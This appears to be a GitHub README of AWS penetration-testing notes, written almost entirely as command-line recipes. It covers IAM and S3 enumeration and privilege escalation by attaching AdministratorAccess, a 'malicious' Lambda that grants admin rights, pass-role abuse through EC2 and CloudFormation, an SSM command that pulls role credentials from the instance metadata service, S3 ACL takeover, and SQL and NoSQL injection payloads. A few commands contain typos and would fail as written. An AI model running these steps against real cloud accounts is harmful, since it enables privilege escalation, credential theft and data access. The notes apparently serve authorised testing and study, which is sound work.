Skip to content

NickTheSecurityDude/AWS-Pentesting-Notes

BranchesTags

Repository files navigation

AWS Pentesting Notes

IAM

CLI Enumeration

# List Users
aws iam list-users

# List Groups for User
aws iam list-groups-for-user --user-name user1

# Check Policies Attached to User
aws iam list-attached-user-policies --user-name user1
aws iam list-user-policies --user-name user1

# Read Inline Policy
aws iam get-user-policy --user-name user1 --policy-name policy1
# Check for any Signing Certificates for a User
aws iam list-signing-certificates --user-name user1

# Check for any public SSH keys for User
aws iam list-ssh-public-keys --user-name user1

# Get ssh key details
aws iam get-ssh-public-key --user-name user1 --encoding PEM --ssh-public-key-id APKA...

# List MFA devices
aws iam list-virtual-mfa-devices

# Check for user login profile
aws iam get-login-profile --user-name user1

# List Groups
aws iam list-groups

# Check Group Policies
aws iam list-group-policies --group-name group1
aws iam list-attached-group-policies --group-name group1

# List Policies
aws iam list-policies

# List Customer Managed Policies
aws iam list-policies --scope Local | grep -A2 PolicyName

# Get Policy Details
aws iam get-policy --policy-arn arn:aws:iam:...

# Get Policy Version Document
aws iam get-policy-version --policy-arn arn:aws:iam::... --version-id v1

# List IAM Roles
aws iam list-roles

# Check Role Details
aws iam get-role --role-name role1

# Check for policies attached to roles
aws iam list-attached-role-policies --role-name role1
aws iam list-role-policies --role-name role1

IAM Privilege Escalation

Allow remote access to role / Misconfigured Trust Policy

aws iam create-role --role-name malicious-role --assume-role-policy-document file://assume-role-doc.json

Assume misconfigured role

aws sts assume-role --role-arn arn:aws:iam::1234:role/malicious-role --role-session-name session1
export AWS_ACCESS_KEY_ID=ASIA...
export AWS_SECRET_ACCESS_KEY=...
AWS_SESSION_TOKEN=...
aws sts get-caller-identity

Exploit Attach User Policy

aws iam attach-user-policy --user-name user1 --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam list-attached-policies --user-name user1

Create a new user

aws iam create-user -user-name user2

Add User to Group

aws iam add-user-to-group --group-name admins --user-name user1
aws iam list-groups-for-user --user-name user1

Attach Admin Policy to Group

aws iam attach-group-policy --group-name users --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam list-attached-group-policies --group-name users

Create new policy version:

aws iam create-policy-version --policy-arn arn:aws:iam::12343:policy/policy1 --policy-document file://admin-policy.json --set-as-default
aws iam get-policy-version --policy-arn arn:aws:iam::1234:policy/policy1 --version-id v2

Create a Login Profile:

aws iam create-login-profile --user-name user1 --password P4ssW0rd1$ --no-password-reset-required

Lambda

aws lambda get-function --function-name DynamoFunction --query 'Code.Location'
curl "url" --output function.zip

Pass Role

Malicious Lambda

import boto3
def handler(event, context):
  iam_cilent = boto3.client("iam")
  response = iam_client.attach_user_policy(
    UserName="user1", PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
  )
  return response

aws lambda create-function \
--function-name lambda-pass-role \
--runtime python3.8 \
--zip-file fileb://lambda-pass-role.zip \
--handler lambda-pass-role.handler \
--role arn:aws:iam::1234:role/LambdaAdmin
aws lambda invoke --function-name lambda-pass-role output.txt
aws iam list-attached-user-policies --user-name user1

EC2 Pass Role

aws iam list roles
# Look for "Service": "ec2.amazon.aws.com"

# Get Instance Profile ARN
aws iam list-instance-profiles

# Get ami id
aws ec2 describe-images --owners amazon --filters 'Name=name,Values=amzn-ami-hvm-*-x86_64-gp2' 'Name=state,Values=available' --output json

# Get subnet
aws ec2 describe-subnets

# Get Security Group
aws ec2 describe-security-groups

aws ec2 run-instances --subnet-id subnet-abcd --image-id ami-abcd --iam-instance-profile Name=admin-role --instance-type t2.micro --security-group-ids "sg-abcd"

Get Access Keys Using SSM Run Command

aws ssm send-command \
--document-name "AWS-RunShellScript" \
--parameters 'commands=["curl
http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2admin/"]' \
--targets "Key=instanceids,Values=i-abcd" \
--comment "aws cli 1"

aws ssm get-command-invocation \
--command-id "0abcd-aa-aa-bb" \
--instance-id "i-abcd"

Cloud Formation Pass Role

aws cloudformation create-stack --stack-name my-stack --template-body file://cf-malicious-policy-for-user.yaml --capabilities CAPABILITY_NAMED_IAM --role-arn arn:aws:iam::1234:role/AdminRole
aws cloudformation describe-stacks --stack-name my-stack
aws cloudformation describe-stack-events --stack-name my-stack
aws iam list-user-policies --user-name user1

S3

Enumeration

aws s3 ls
aws s3api list-buckets

# Get Bucket Region
aws s3api get-bucket-location --bucket my-bucket

# List Objects
aws s3api list-objects-v2 --bucket my-bucket
aws s3api list-objects --bucket my-bucket
aws s3 ls s3://my-bucket

# List Objects from public bucket
aws s3 --no-sign-request --region us-east-1 ls s3://my-public-bucket

# Get Object Versions
aws s3api list-object-verisons --bucket my-bucket

# Check ACLs
aws s3api get-bucket-acl --bucket my-bucket
aws s3api get-object-acl --bucket my-bucket --key testfile.txt

# Download file
aws s3 cp s3://my-bucket/testfile.txt .

# Download file from public bucket
aws s3 --no-sign-request cp s3://my-bucket/testfile.txt .

# Check if bucket policy is public
aws s3api get-bucket-policy-status --bucket my-bucket

# Get bucket policy
aws s3api get-bucket-policy --bucket my-bucket --output text | python -m json.tool

# Check for public access block
aws s3api get-public-access-block --bucket my-bucket 

# Check if bucket is website
curl https://<bucket-name>.s3.amazonaws.com/index.html

Spoof User Agent

curl -H "User-Agent: <user-agent>" http://<bucket-name>.s3.amazonaws.com/testfile.txt
curl -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0" http://<bucket-name>.s3.amazonaws.com/testfile.txt

Policy Write Access Exploit

aws s3api put-bucket-policy --bucket my-bucket --policy file://s3-full-access-resource-policy.json

Writable bucket ACL Exploit

aws s3api get-bucket-acl --bucket <bucket-name> > acl.json
sed "s/WRITE_ACP/FULL_CONTROL/" acl.json
aws s3api put-bucket-acl --bucket <bucket-name> --access-control-policy file://acl.json
aws s3api list-objects --bucket <bucket-name>

Writable object ACL Exploit

aws s3api get-object-acl --bucket <bucekt-name> --key testfile.txt > objacl.json
sed "s/WRITE_ACP/FULL_CONTROL/" objacl.json
aws s3api put-object-acl --bucket <bucket-name> --key testfile.txt --access-control-policy file://objacl.json
aws s3api list-objects --bucket <bucket-name>

AWS Databases

SQLi

# Try one of the following:
' or '1'='1
admin' or '1'='1
admin'
' or '1'='1 --
\' or 1=1 --

DynamoDB Comparison Operators

EQ = Equals
GT = Greater Than
NE = Not Equals
NOT_CONTAINS = Doesn't contain

DynamoDB Field Types

S = Stirng
N = Interger

Document DB Comparison Operator

{
  "username" : {
    "$gt":""
   },
   "password" : {
     "$gt":""
   }
}

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

3 stars

Watchers

1 watching

Forks

3 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages